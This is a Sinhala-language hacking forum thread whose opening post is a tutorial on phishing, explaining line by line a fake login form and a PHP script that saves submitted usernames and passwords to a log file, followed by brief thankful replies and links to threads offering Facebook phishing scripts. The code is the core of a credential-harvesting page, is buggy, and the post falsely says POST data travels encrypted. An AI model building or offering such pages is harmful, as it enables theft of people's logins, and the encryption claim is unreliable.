ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here




 
[Tut] Understand Phishing
#1
අද අපි බලන්න යන්නේ phishing ඇටෑක් එකක් වෙන්නේ කොහොමද කියන එක තේරුම් ගන්න. Phishing කියන්නෙ මොකක්ද කියලා දන්නවනෙ. මේක අපි කොටස් තුනකට බෙදලා තේරුම් ගනිමු.

මුලින්ම ලොගින් ෆෝරම් එකට අදාල කෝඩ් එක බලමු. මේක html වලින් තමා ලියලා තියෙන්නේ.
(මේ පේජ් එක අපි තේරුම් ගන්න විතරක් හදන එකක් නිසා අවශ්‍ය මූලිකම කෝඩ් විතරක් දැම්මෙ .)


<html>
<body>
<form action="post.php" method="post">
user name:<br>
<input type="text" name="userid" >
<br>
password:<br>
<input type="password" name="pass" >
<br>
<input type="submit" value="Submit">
</form>
</body>
</html>

දැන් අපි එකින් එක බලමු මොකද වෙන්නේ කියලා.
<html> --html කෝඩ් එක පටන් ගැනීම.
<body> --page එකේ ප්‍රධාන කොටසේ පටන් ගැනීම .

<form action="post.php" method="post">
මේකෙන් කරන්නේ අපේ ලොගින් ෆෝර්ම් එකේ පටන් ගැනීම.
මේක සාමාන්‍යයෙන් දක්වන්නේ <form> කියලා අපි මේකේ අමතරව දක්වන ඒවගේ තේරුම බලමු.

action = post.php
මේකෙ තේරුම මේ ෆෝරම් එකේ ඩේටා ෆිල් කරලා submit බට්න් එක ඔබපුවාම මේ තොරතුරු post.php එකට යවන්න කියන එක.

Method =post
මේකෙන් කියන්නෙ අපි html form එකෙන් php ෆයිල් එකට data යවන්නේ post කියන ක්‍රමය යොදාගෙන කියන එක .මේ ක්‍රමයෙදි ඩේටා එන්ක්‍රිප්ට් වෙලා තමා යන්නේ .එතකොට url එකෙ අපේ ඩේටා පෙන්වන්නේ නෑ.
(මේ වගේ අනික් ක්‍රමය තමා get කියන එක. මේකත් සමහර වෙලාවට ගන්නවා. මේකෙදි අපේ ඩේටා url එකේ පෙන්වනවා .හොඳම උදාහරණය තමා ගූගල් එකේ සර්ච් කරද්දී url එක බලන්නකෝ.)

user name:<br>
මේකෙන් වෙන්නේ username කියලා ප්‍රින්ට් වෙන එක.
<input type="text" name="userid" >
<br>

මේකෙන් කරන්නේ user name එක ලබාගන්න එක ඒක ගන්නෙ userid කියන එකට සමාන කරගෙන.

password:<br>
මේකෙන් වෙන්නේ කලින් වගේම password කියලා ප්‍රින්ට් වෙන එක.

<input type="password" name="pass" >
<br>
මේකෙන් කරන්නේ password එක ලබාගන්න එක ඒක ගන්නෙ pass කියන එකට සමාන කරගෙන.
මේකෙ විශේෂ දෙයක් තියෙනවා type=password දුන්නම ඉන්පුට් කරන කොට අර නිකන් තරු වගේ තමා පේන්නෙ.

<input type="submit" value="Submit">
මේක තමා සබ්මිට් බට්න් එක. මේක ක්ලික් කරාම තමා ඩේටා ටික සෙන්ඩ් කරන්නෙ.

</form> -ෆෝර්ම් එක ඉවරයි.(නොට් uf)
</body> - ප්‍රධාන කොටස ඉවරයි.
</html> - html code එක ඉවරයි.



හරි ඊලඟ කොටස තමා post.php එක.


<html>
<body>
<?php

$user = $_POST["userid"]
$pass =$_POST["pass"]

$file = fopen("logs.txt", "w")

fwrite($file, $user);
fwrite($file, "/n");
fwrite($file, $pass);

fclose($file);
?>
</body>
</html>

දැන් එකින් එක කොටස බලමු මොකද වෙන්නෙ කියලා.

<?php - php code එකේ ආරම්භය

$user = $_POST["userid"]
කලින් ෆෝරම් එකෙන් userid කියලා ගත්ත යූසර්නේම් එක user කියන වේරියබල් එකට සමාන කරනවා.
$pass =$_POST["pass"]
මේකත් උඩ එක වගේම තමා.
(Php වල වෙරියබල් එකක් හදන්නේ ඔහොම තමා ඒකට ඉදිරියේ $ ලකුනක් දාලා.)

$file = fopen("logs.txt", "w")
fopen( ) කියන්නේ php ෆන්ක්ශන් එකක් .
ඕකෙන් කරන්නේ logs.txt එක තියෙනවානම් ඕපන් කරනවා නැතිනම් අලුතින් හදලා ඕපන්කරනවා .ඒ කරලා file කියන වෙරියබල් එකට සමාන් කරනවා.
W කියන එකේ තේරුම අපිට write කරන්න පර්මිශන් තියෙනවා .

fwrite($file, $user);
fwrite( ) කියන්නේ php ෆන්ක්ශන් එකක් .
ඕකෙන් කරන්නේ file එකට user කියන වෙරියබල් එක ලියන එක.


fwrite($file, "/n");
මේකෙන් කරන්නෙ හිස් ලයින් එක්ක් හදන එක.

fwrite($file, $pass);
මේකෙ කලින් විදිහටම තමා.
fclose($file);
ෆයිල් එක වහලා දානවා.


හරි ඔය සිද්ධිය තමා වෙන්නේ. ඊලඟ ටියුට් වලින් සෙට් වෙමු.


excessively written for U.F
Ph03n1x
A noob hacker



_ __
_ _| | ___ _ ___ ___ __ _ / _| ___ _ __ _ _ _ __ ___ ___
| | | | |/ / | | / __/ __|/ _` | | |_ / _ \| '__| | | | '_ ` _ \/ __|
| |_| | <| |_| \__ \__ \ (_| | | _| (_) | | | |_| | | | | | \__ \
\__,_|_|\_\\__,_|___/___/\__,_| |_| \___/|_| \__,_|_| |_| |_|___/
#2
Elama TFS mcn Wink
|+| Knowledge |+| Discipline |+| Patience |+|

Area Master 
(Founder & Info. Sec. Analyst)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries: [email protected] 
Reply
#3
supiri godak dewal igana gaththa
Reply
#4
ela bro..
TFS.. Smile
<>
.:: [Induwara Uthsara] :: [රතු කුරුල්ලා] ::.
Idea  [Only registered and activated users can see links Click here to register] Idea
 Idea [Only registered and activated users can see links Click here to register]  Idea
</>
Reply
#5
Ammo patta bn tawa tut ekak one ikmnta
Reply
#6
ඒ පෝස්ට් එක පට්ට!?
Big Grin 7H1L1N4_N1M35H Big Grin
Cool >Admin Of [Only registered and activated users can see links Click here to register]< Cool
3V3RY_5Y573M_H4V3_VULN5
   ->[Only registered and activated users can see links Click here to register]<-    
   Rolleyes     
Reply
#7
reply valata thanks guys. ubala dana comments valin thama thava tute danna fit ekak enne.
Reply
#8
Ft......
Reply
#9
Patta TFS
Reply
#10
පට්ට තව ටිකක් advance විදියට ඉලගට tut එක කරන්න. ආරම්භයක් හැටියට නියමයි. good luck bro TFS  love love
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
Star [Tut] FACEBOOK හැක් කරමු | FACEBOOK HACKING BY PHISHING Elite_x 38 2,109 03-17-2019, 02:02 PM
Last Post: blak dragon
  [Tut] kali linux phishing tool(new) OWL99 11 854 03-01-2019, 02:00 PM
Last Post: OWL99
Star [Downloads] Facebook Mobile Phishing Script Download [2019 official] Elite_x 7 249 02-27-2019, 02:34 PM
Last Post: Lushion Hydra
Star [Downloads] Facebook Phishing Script [2019 official] Elite_x 5 624 02-24-2019, 08:03 AM
Last Post: Muskiya
Lightbulb [Tut] Phishing, Vishing, baiting, tailgating ඇන්ඩ් quid pro quo. Mmx 16 1,200 02-23-2019, 04:59 PM
Last Post: Lushion Hydra
Star [Tut] Free Hosting Sites for Phishing Elite_x 5 267 02-17-2019, 08:42 AM
Last Post: Induwara Uthsara

Forum Jump:


Users browsing this thread: 1 Guest(s)